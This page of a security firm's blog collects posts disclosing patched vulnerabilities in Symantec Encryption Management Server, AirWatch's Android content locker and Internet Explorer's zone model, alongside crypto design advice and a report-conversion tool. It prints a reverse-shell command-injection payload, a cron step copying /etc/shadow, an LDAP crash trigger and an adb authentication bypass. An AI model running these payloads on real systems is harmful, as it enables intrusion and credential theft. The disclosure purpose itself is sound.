RSS Feed

Vulnerability Disclosure Info: Symantec Encryption Management Server

During a security assessment project in 2015 GDS encountered a fully patched Symantec Encryption Management Server appliance. This product provides secure messaging both between users of the organization and with external users. Each server is managed via an administrative web interface. During the project, and follow on research, GDS discovered several issues that were reported to Symantec and have subsequently been addressed in later releases of the software. Now that Symantec customers, among them some of our clients, have had ample time to apply the relevant patches we thought we’d share details of these vulnerabilities.

OS Command Execution

The administration web interface includes the facility to search the log files. When performing a search, it was possible, using a specially crafted search term, to execute OS level commands on the appliance. The search functionality dynamically built a command string, with untrusted user input, that was then executed by the operating system command shell. Insufficient validation of the supplied parameters exposed arbitrary command execution and provided an attacker with privileges or capabilities previously unavailable.

This issue required a user account with low privilege access to the administrative interface. The lowest privilege user role with this level of access is Reporter.

The following text, entered into the search box, was used to start an interactive, reverse TCP connection, shell.

|` /bin/bash -i >& /dev/tcp/ 0>&1`

The resulting interactive shell is executed as user tomcat.

CVE-2015-8151 was assigned to cover the above issue.

Local Privilege Escalation

The tomcat user had write access to the file /etc/cron.daily/tomcat.cron. The contents of this file were executed in the context of the root super-user account. Consequently, given command execution (see above), arbitrary commands could be scheduled for execution as root.

ls -al /etc/cron.daily/tomcat.cron

-rwxrwxr-x 1 root tomcat 88 Jul  6 03:58 /etc/cron.daily/tomcat.cron

As the tomcat user, GDS were able to append additional content to the cron job. For example, with the command below:

$ echo ‘cat /etc/shadow >/tmp/shadow’ >> /etc/cron.daily/tomcat.cron

This cron job was executed daily and ran with root privileges.

ls -l /tmp/shadow

-rw-r—r— 1 root root 825 Jul  6 04:02 /tmp/shadow

cat /tmp/shadow


CVE-2015-8150 was assigned to cover the above issue.

Heap Based Memory Corruption

GDS also discovered a repeatable crash in the LDAP service running on the appliance. This could be reproduced using the following simple python script.

python -c “import socket; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((‘’, 636)); s.send(‘803a01030100030000002e00000040404141414142424242434343434444313145454545464646464747474731314848494949494a4a4a4a4b4b4b4b’.decode(‘hex’))”

This will trigger a SIGSEGV signal and the service will exit. LDAP and LDAPS will not be available until the service has been automatically restarted.

CVE-2015-8149 was assigned to cover the above issue.

Vendor Update

Symantec have released fixes for the issues described above in SEMS 3.3.2 MP12. For more information from the vendor see


Insights from the Crypto Trenches

At GDS we are in the particularly advantageous position of working with a wide variety of products, spending time understanding their security and often uncovering their flaws. Given this experience, we decided to share some of our thoughts on the cryptographic aspects of building modern software.

It should come as no surprise to anyone in the field of security engineering that working with crypto is a perilous business, and even highly experienced engineers can get it wrong sometimes. Sophisticated attacks come along once in awhile, partially breaking OpenSSL and other well-respected security libraries. However, for those who have spent enough time in the trenches of cryptographic security, it is clear that the vast majority of crypto issues don’t stem from the underlying vulnerability of a well-respected library. Instead, they by far stem from incorrect design and implementation-specific issues of well-built crypto components. In this blog post we try to expand on why design and implementation goes wrong and give advice on making things go better.

Modern, agile software development processes generally merge some of the stages of requirements analysis, architecture, design, implementation and testing. However, in the case of cryptography it is dangerous to conflate these distinct stages. Cryptography must be considered at all these stages, and because of its difficulty and importance for securing important data and decisions, it must be given higher priority than most other elements. As such, it is typical for a software house to discuss crypto-related decisions for longer, and entrust cryptographic aspects of the system to be implemented by one of the most senior engineers. Both of these help, as do checklists such as those implemented by [1] or guidance such as that provided on Martin Fowler’s blog [2].

However, no checklists or easy guides exist for hand-rolled cryptographic constructs. When it comes to designing systems that use cryptography to achieve an end goal, one of the fundamental mistakes made by designers is to reinvent the wheel in the crypto design space. This is not necessarily because anybody needs the burden of designing something new. Instead it’s because it is hard to know what class of problems can be solved with a certain cryptographic construct. It also doesn’t help that cryptographic terminology can be very confusing. For example, Pseudo Random Functions (PRFs) are always implemented as a deterministic function that neither uses, nor exhibits, any random behaviour [3]. For this reason, GDS recommends bringing in experts, either internal or external, to early crypto design discussions. An expert can not only help mitigate the risk of misusing cryptography, but may also offer ways of reusing existing crypto constructs, reducing the overall cost and time budget of the project.

When it comes to writing code, those who are entrusted to implement the agreed-upon design often find themselves in a tight spot. They have to battle with two separate issues: what crypto library to use for a particular crypto construct and in what way should it be used.

At GDS, we advise our clients to use very few, battle-hardened crypto libraries with strongly restricted configuration sets to meet a large set of generic requirements. Unfortunately, cryptographic agility [4], as implemented by OpenSSL, is often at odds with restricted configurations and hardening. Although OpenSSL is the default go-to crypto library of choice, politics such as government-mandated cryptographic primitives (CAMELLIA from Japan, ARIA from South Korea, GOST from Russia, etc) and misguided optimizations (such as 27,000 lines of Perl generating assembly in OpenSSL) also makes it the elephant in the room that no one really wants to question. However, there is very little else to opt for. The obvious other choice is libnacl [5], written by a team led by Dan Bernstein that tries to significantly limit the number of implemented crypto constructs and hence configurations, reducing the cognitive load and simplifying the job of the person charged with implementation. Although libnacl is a great library, its restricted functionality is often an issue — but it excels at what it does implement. This is true for other specialized libraries as well, such as scrypt [6] that can be used for storing salted and hashed passwords or to derive keys from passwords. The library libsodium [7] builds on libnacl, attempting to address some of its portability and usability concerns. However, it is relatively new and mostly written by a single developer without the crypto pedigree of the nacl team. We therefore caution against using it in production environments. It’s not easy when it comes to working in code with cryptography, which leads us to our next topic.

The second biggest headache that developers face at the implementation stage is the actual code around the use of the chosen crypto library and its constructs. It is not unheard of to see developers surprised to see their sensitive memory-cleaning code being optimised away by smart compilers [8]. As such, GDS recommends using high quality standards around crypto code. In all instances, the actual standards enforced are a function of language, developer familiarity, and a number of business factors such as coding language and culture, however, [9] and [10] are good starting points for C/C++. For example, when coding in C11, using secure version of functions that typically end with “_s” are good practice. The C11 standard requires that memset_s never to be optimised away. Given the number of pitfalls such as these, internal code reviews and a final, third-party code review by an expert is important and highly recommended. Whether the third party is internal or external to the organisation, an expert will pick up problems that those less well versed around the use of crypto may not.

Finally, before software is shipped to customers, an overall, system level review of all elements of the cryptographic system is in order. As the above examples show, it is not easy to get crypto right even if the bits and pieces fit well together. Unfortunately, holistic security of a product depends on intricate interactions of the cryptographic subsystem with the rest of the application, its users, the cultural and social environments it will get deployed in, and the business’ goals. The points where these meet are an ample source of confusion and error. As such, a final review is always recommended.

At GDS, we get to see a lot of crypto code, often only at the final stages of development or beyond, when it’s already in active use by end users. Fixing issues at this stage is costly to the business and frustrating to the developers. Sometimes, when looking at the issues, one wonders how much time could have been saved by using the correct crypto constructs from the right libraries, using good coding guidelines from the get go — no wasteful reinvention of the wheel and no costly retrofitting needed. When it comes to crypto, experience is key. Above, we have tried to put into writing some of the key recommendations that experienced crypto engineers give to solve real-world problems. Naturally, we have plenty more, but we always try to tailor them to needs of the application at hand. In a series of blog posts to follow we plan to go more in-depth into some of the crypto issues we highlighted above, and more.



AirWatch Vulnerabilities from the GDS Archives


At GDS, we’ve researched many Mobile Application management (MAM) container platforms over the years. Early last year, we published a whitepaper and security checklist on the subject to assist developers, security teams, and buyers of MAM platforms. Today we’re releasing details on vulnerabilities in the AirWatch MAM platform that we discovered two years ago that have long since been patched. We still regularly run into these types of bugs in similar platforms in 2016, so we thought it’d be helpful to take a look at a few of them in detail.

In May 2014, we were doing independent vulnerability research poking around at the AirWatch Mobile Device Management Secure Content Locker (SCL) application for Android. During our brief analysis, we discovered a number of vulnerabilities in the SCL application that could allow an attacker with access to a user’s device to bypass the application security and gain access to the encrypted content stored in the application’s sandbox. GDS disclosed the vulnerabilities to AirWatch in May 2014. These have all been remediated by the application vendor and are listed below:

1. User Passwords Susceptible to Offline Brute Force Attacks

2. Inadequate Enterprise Wipe

3. Symmetric Key stored using Java String Object

4. Authentication Bypass via Exported Activities

5. Static IV Used in Cryptographic Operation 

These issues, discovered by Ron Gutierrez, were present in AirWatch Android Agent v4.5.3.782 and Secure Content Locker (SCL) v1.9.2, and were fixed in versions 5.1 and 2.1 respectively. GDS would like to commend AirWatch on their responsiveness and rapid deployment of fixes.

These issues will be discussed further in the rest of this blog post.

Issue Descriptions

User Passwords Susceptible to Offline Brute Force Attacks

The routines used to perform offline authentication to the AirWatch Secure Content Locker application used an unsalted SHA-256 hash to validate the user’s passphrase. This made it possible for an attacker, who gains access to a victim’s stolen device, to perform an offline brute force attack on this hash, in order to determine the AirWatch authentication credentials. Depending on how an organization integrates authentication with AirWatch these credentials are likely to be the user’s Active Directory password. However, as was in our case below this password could be an AirWatch specific password. Note, while AirWatch employs device root detection this does not prevent an attacker who has stolen the device from rooting it and then directly accessing the configuration file storing the hash. This configuration file is at the following location:


An example of the contents of this file is shown below:

<string name="seedHash">NEHfC6vCot2lUdfNOfsjW8TgnNHkVWvyYbtJGI9Ug0g=</string>

GDS verified that this was indeed the AirWatch specific password set up for our test device using the following python code:

>>> import base64
>>> import hashlib
>>> output = base64.b64encode(hashlib.sha256("testing1234").digest())
>>> print(output)

Inadequate Enterprise Wipe

AirWatch provides an Enterprise Wipe option that is available to device administrators. This option performs an application level wipe rather than initiating a full device wipe, i.e. for organizations using AirWatch to remove company resources from an employee owned device while leaving personal data and the underlying phone configuration intact.

Unfortunately, the Enterprise Wipe functionality failed to adequately eliminate company data from the device’s application directory. Therefore, even after this wipe was performed potentially sensitive data was still present in the following directories:


This can be verified by performing an “Enterprise Wipe” yourself and then checking these directories to see the artifacts left behind, such as the “seedHash” from the finding above.

Symmetric key stored using Java String Object

This vulnerability had two distinct issues. Firstly, storing sensitive values in a Java String object will prevent the value from being properly cleared from memory. This is the same reason why it is not recommended to use String objects to process passwords. Java String objects are immutable and can persist long after they are required by the application. The application has little control over when the garbage collector will recycle the memory and even when it is collected the contents may persist until the memory has been reallocated and written to. This increases the risk of the key being read from device memory by malware or stolen using a privilege escalation vulnerability that does not require a device reboot. This vulnerability was verified by decompiling the source code of the binary application as shown below:

private String e(String paramString1, String paramString2)
 char[] arrayOfChar = paramString1.toCharArray();
 String str1 = this.d.getString("Vector", "");
 String str2;
 if (str1.length() == 0)
   str2 = h();
   String str3 = Base64.encodeToString(str2.getBytes(), 0);
   SharedPreferences.Editor localEditor = this.d.edit();
   localEditor.putString("Vector", str3);
 byte[] arrayOfByte;
 while (true)
   PBEKeySpec localPBEKeySpec = new PBEKeySpec(arrayOfChar, a(paramString2,
                                                 str2, "A1rW4tchR0xin4t0R"),
                                               20000, 256);
   arrayOfByte = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1")
   if (arrayOfByte != null)
   return null;
   str2 = new String(Base64.decode(str1, 0));
 return new String(arrayOfByte);

The second issue is that using a String object to store a symmetric key value can lead to a decrease in the overall entropy of the key due to String objects attempting to convert the key material to charset encodings. On Android, the default charset is UTF-8 and any byte sequence that is not a valid UTF-8 character will be replaced with the byte sequence EF BF BD (hex), which corresponds to the Unicode codepoint U+FFFD ‘REPLACEMENT CHARACTER’. This introduces a security risk since invalid byte sequences within the key will be converted to the EFBFBD sequence reducing the overall entropy of the key.

Using the Cydia Substrate tool available on rooted Android devices we can write hooks for Java methods to, for example, print out the contents of the parameters during runtime. The following hook was written to print out the contents of the parameters to the com.airwatch.crypto.openssl.e.b(byte[], String) method.

MS.hookClassLoad("com.airwatch.crypto.openssle", new MS.ClassLoadHook() {
 public void classLoaded(Class<?> resources) {
   String methodName = "a";
   Method lmethod;
   try {
     lmethod = resources.getMethod(methodName, Context.class);
   } catch (NoSuchMethodException e) {
     Log.w(_TAG, "No such method: " + methodName);
     lmethod = null;
   final MS.MethodPointer old = new MS.MethodPointer();
   if (lmethod != null) {
   MS.hookMethod(resources, lmethod, new MS.MethodHook() {
       public Object invoked(Object resources, Object... args)
                     throws Throwable {
         Log.i(_TAG, "com.airwatch.a.b.a() is hit");
         Log.i(_TAG, "param1: " + bytesToHex((byte[])args[0]));
         Log.i(_TAG, "param2: " + printString((String)args[1]));
         return old.invoke(resources, args);
     }, old);
public static String bytesToHex(byte[] bytes)
 char[] hexChars = new char[bytes.length * 2];
 for ( int j = 0; j < bytes.length; j++ ) {
   int v = bytes[j] & 0xFF;
   hexChars[j * 2] = hexArray[v >>> 4];
   hexChars[j * 2 + 1] = hexArray[v & 0x0F];
 return new String(hexChars);

The console output below shows the values returned by the application.

param1: 4B46FAF3F28FA6B3F7A44951D4F8330CCD0C82D42438D053209B21473EEA130545605F245D241E1B332ECBF87F263B9E

// Base64 decoded ‘master_encryption_key’ stored in SharedPreferences XML file.


// Derived Encrypted Key from AirWatch Password

As you can see in the output above, due to the charset conversion process this issue causes the resulting symmetric key to lose a total of 22 bytes of entropy rather than containing the the expected 32 bytes of entropy.

Authentication Not Enforced when calling Search or Main Activities directly.

The application contains several Activities, which can be found in the AndroidManifest.xml file, that can be abused to bypass the password lock screen. These Activities do not contain the necessary logic to force the user back to the authentication screen. By exploiting this issue an attacker can access metadata of files stored within SCL without knowledge of the user’s login credentials. Therefore, we can deduce that either the file metadata is not encrypted by the application, or that the application can decrypt the content stored in its application directory without requiring the user’s credentials. Either scenario is bad for an application such as this. A walkthrough for exploiting this behavior in the Search Activity is provided below. Explotation of the Main Activity is identical, the only caveat being that exploiting the Main Activity requires the device be to rooted.

Below you can see the intent filter for the SearchActivity from the AndroidManifest.xml file:

<activity android:name="com.airwatch.contentlocker.ui.SearchActivity"
   <action android:name="android.intent.action.SEARCH" />
 <meta-data android:name=""
            android:resource="@xml/searchable" />


With the SCL application closed out on the target device, connect your adb in the usual manner. After which enter the following commands to manually invoke the “SearchActivity” intent:

adb shell am start -a android.intent.action.SEARCH -n com.airwatch.contentlocker/com.airwatch.contentlocker.ui.SearchActivity -e "query" "t"

Upon pressing enter on the above command the SearchActivity intent will fire, and by checking your target devices screen, you’ll see that a search was performed for the input “t”, seen in the screenshots below:

Static IV Used in Cryptographic Operations

The last issue that GDS discovered in the AirWatch SCL application is a fairly pervasive bad practice throughout the cryptography world. As stated in the title, a static IV is used in several of the cryptographic operations performed by the application, including the one responsible for decrypting managed files – awFileDecryptUsingKeyIV. The awFileDecryptUsingKeyIV function accepts several arguments, the path to the encrypted file, the path to the output file, the decryption key, and the IV. The IV in this case consists of the numbers 0 through 15, repeated twice, to create a 32-byte long IV, where there is a static or constant IV, the resulting effect on cryptographic operations is that, it can facilitate practical attacks when comparing multiple ciphertexts. What this means is, the more things you encrypt, the easier it is to guess the decryption key.

A code snippet has been provided below. Since the decompiled code was obfuscated, the filenames and variables below will need to be mapped to the original codebase in order to locate the vulnerable code.

 27:   private static final byte[] j = { 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15 };
 95:   public static void a(File paramFile1, File paramFile2, String paramString)
 96:    {
 97:         i.lock();
 98:         try
 99:    {
100:        e.awFileDecryptUsingKeyIV(c.getFileStreamPath("fipsOpenSSlRSA.enc").getAbsolutePath(), paramFile1.getAbsolutePath(), paramFile2.getAbsolutePath(), paramString.getBytes(), j);
101:        return;
102:   }
103:        finally
104:   {
105:        i.unlock();
106:   }
107:        throw localObject;
108:   }


As can be seen in the decompiled code snippet above, our encryption IV value is the 0 through 15 repeated twice in a byte array.


Local Request Forgery

This post explains how to abuse Internet Explorer’s Local Intranet Zone using malicious web pages served from the local disk. In corporate environments this could lead to impersonation of the victim on internal web applications and exfiltration of data outside the corporate network. 

Internet Explorer renders web pages in Security Zones; each zone comes with security settings that reflect the level of safety of that zone. 

When Internet Explorer opens a web page, the Urlmon DLL determines the zone from which the page was loaded. There are four predefined security zones:

  • Local intranet zone: all sites inside an organisation.

  • Trusted sites zone: all sites considered trusted.

  • Restricted sites zone: all sites considered not trusted. 

  • Internet zone: all Internet sites (not in the Trusted or Restricted zones)

In addition to the above four zones, the hidden My Computer zone includes all files served from network shares, the local hard disk and removable drives.


Cross-Site Request Forgery (CSRF) is an attack that abuses the inherent trust a web server places in the browser. Generally, any request within an authenticated session is assumed to be made, directly or indirectly, by the user. The attack described below can be considered a variation of Cross-Site Request Forgery where the attacker can also read the response. Instead of coercing the user to visit a malicious Internet website, the attacker sends an email with a malicious HTML page attached; when the victim opens this page with Internet Explorer it is loaded from the local file system and Internet Exploror (IE) renders it in the My Computer security zone. This zone allows scripts to issue requests to any website bypassing both the Same Origin Policy (SOP) and Cross-Origin Request Sharing (CORS).


Since IE 7, Protected Mode adds an integrity mechanism to restrict write access to securable objects (like processes, files, and registry keys) with higher integrity levels. If Protected Mode is disabled cookies are included when (malicious) scripts issue HTTP requests. The Local Intranet Zone is used in many corporate environments for internal web applications. Note that Protected Mode is disabled by default for the Local Intranet Zone on all current versions of Internet Explorer. Consequently, the malicious web page attached to an email described above can include JavaScript to target an internal application to which the victim is authenticated. This JavaScript will bypass SOP and CORS, because the page is rendered in the My Computer Zone, which enables the attacker to perform requests and read responses.


Demo Application

A simple demo web application was built as a Proof-of-Concept. The application is served from the Local Intranet Zone domain www.corporate.internal as shown in the screenshot below:


Monet HR is a web application used for HR purposes, it allows employees to view and manage their personal data such as personal and employment information, compensation, holidays, etc. 


The demo application exposes a single Servlet to authenticated users:


The servlet allows the user to perform two actions:

  • getCSRF (retrieves the CSRF token associated with user’s session)

  • getInfos (retrieves user’s information, it requires a CSRF token)



  1. The target web application is served from the Local Intranet Zone.

  2. Protected mode is turned OFF for Local Intranet Zone (default).

  3. The victim is authenticated on the target web application.


Attack PoC

  1. The victim receives an email with a web page attached.

  2. The victim opens the web page with Internet Explorer.

  3. The victim clicks on “Allow Blocked Content” button.

  4. (only for demo purposes) The victim clicks on “Steal Infos”, this triggers the malicious script.


The page served from the local file disk is rendered in the My Computer Zone, and can therefore bypass the Same Origin Policy and Cross Origin Resource Sharing. It can send requests to any application in the Local Intranet Zone, and cookies will be included in the request.

  1. When clicking on the button Steal Infos the JavaScript first issues an XHR to http://corporate.internal/monet/logged/userHandler to retrieve the CSRF token. This violates CORS (the script sends a cross-domain POST request with content type application/json but no preflight OPTIONS request is performed). It also violates SOP as the script can read the response coming back from a different origin.

  2. Having retrieved the CSRF token the JavaScript issues another request to the demo application, requesting the user’s information (a CSRF token is required in the JSON object). Again the JavaScript violates CORS and SOP, as it sends a POST request (with application/json content type) and it can read the user’s personal information back
  3. The malicious page then exfiltrates the stolen data to a third party website ( using a POST request with content type application/json (thus still in violation Cross-Origin Resource Sharing) and can read the response to that request as well (still violating SOP).

The above explanation can be referenced in the screenshot below where request and responses are printed in the DOM.

 The attacker can then view the exfiltrated data on a domain outside of the corporate network:



The attack described above may be considered a variation of Cross-Site Request Forgery. However, server-side CRSF mitigations are not applicable. The demo application employed in the PoC required the submission of an anti-CSRF token, but since the malicious JavaScript can bypass SOP and CORS, it can read the CSRF token and use it in the request.

As this is a client-side issue, the only effective mitigation is to ensure that Internet Explorer enforces SOP and CORS by enabling Protected Mode for the Local Intranet Zone. Since Internet Explorer 7.0 on Windows Vista, this can be achieved through Group Policy Objects (GPO).




Convert2FPR: Introducing ESLint and PMD support.

Convert2FPR:  introducing ESLint and PMD support.

Expanding on our previous blog post where we released a tool to convert Findbugs’ XML output into Fortify’s FPR format, we’ve now released two additional XSL transformations to provide ESLint and PMD XML output conversion.  

ESLint is an open source JavaScript lint application written using Node.js. ESLint allows all rules to be completely configurable, allowing developers to create their own rules. A number of security plugins for client-side JavaScript and Node.js have emerged recently.

PMD is a source code analyser that supports Java, JavaScript, PL/SQL, Apache Velocity, XML and XSL. GDS released security rules for PMD in a previous post.

We’ve also added a fast XSL transformation for Findbugs, which transforms only security related issues to the FPR format.

The example below demonstrates current the usage of the tool:


$ java -jar convert2FPR.jar findbugs report.xml

Fast-Findbugs (Security Issues only)
$ java -jar convert2FPR.jar findbugs-fast report.xml

$ java -jar convert2FPR.jar eslint report.xml

$ java -jar convert2FPR.jar pmd report.xml


The first parameter represents the input format; the second parameter is the XML report we wish to transform. The output file is ./report.fpr .

The source code and compiled tool can be found in our Github Repository:

Page 1 ... 4 5 6 7 8 ... 31 Next 5 Entries »